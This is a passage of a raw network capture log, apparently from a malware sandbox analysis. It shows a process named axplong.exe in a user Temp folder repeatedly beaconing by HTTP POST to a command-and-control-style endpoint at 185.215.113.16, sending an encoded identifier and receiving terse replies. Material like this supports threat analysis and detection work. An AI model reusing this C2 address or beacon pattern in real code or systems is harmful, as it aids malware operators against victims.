                    Jul 26, 2024 21:02:58.277843952 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:58 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    21192.168.2.749726185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:02:58.399624109 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:02:59.154350042 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:59 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:02:59.157437086 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:02:59.417850018 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:59 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    22192.168.2.749727185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:02:59.542635918 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:00.303636074 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:00 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:00.304704905 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:00.557960987 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:00 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    23192.168.2.749728185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:00.684241056 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:01.490933895 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:01 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:01.492207050 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:01.751204967 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:01 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    24192.168.2.749729185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:01.868762970 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:02.648123026 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:02 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:02.649163961 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:02.897937059 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:02 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    25192.168.2.749730185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:03.009795904 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:03.762062073 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:03 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:03.829514027 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:04.076719999 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:03 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    26192.168.2.749731185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:04.387967110 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:05.187845945 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:05 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:05.188930988 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:05.446070910 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:05 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    27192.168.2.749732185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:05.559901953 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:06.368269920 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:06 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:06.371474981 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:06.641664028 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:06 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    28192.168.2.749733185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:06.761751890 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:07.552160978 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:07 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:07.570028067 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:07.823013067 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:07 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    29192.168.2.749734185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:07.932327032 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:08.722975969 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:08 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:08.725752115 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:08.976841927 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:08 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    30192.168.2.749735185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:09.088984966 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:09.862994909 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:09 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:09.864087105 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:10.143987894 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:10 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    31192.168.2.749736185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:10.327955961 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:11.032474041 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:10 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:11.062325954 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:11.317271948 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:11 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    32192.168.2.749737185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:11.430704117 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:12.172636986 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:12 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:12.173414946 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
